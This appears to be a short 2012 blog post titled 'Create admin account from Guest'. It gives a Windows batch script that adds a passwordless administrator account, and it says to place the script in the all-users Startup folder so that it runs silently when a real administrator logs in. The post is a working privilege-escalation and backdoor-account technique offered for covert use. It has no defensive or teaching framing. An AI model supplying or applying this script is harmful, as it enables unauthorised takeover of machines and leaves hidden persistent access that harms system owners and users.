Wednesday 21 November 2012

Create admin account from Guest

To create an administrator account is easy. You just need to use your guest account and create one administrator account instantly. Just follow the steps :
Open Notepad, paste the following :
@echo off
net user Newadmin /add /expires:never /passwordreq:no

net localgroup “Administrators” /add Newadmin
And save it to a bat file.
Now place this bat file in location local:\ Documents and Settings\ All Users\ Start Menu\ Programs\ Startup
And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you


No comments:

Post a Comment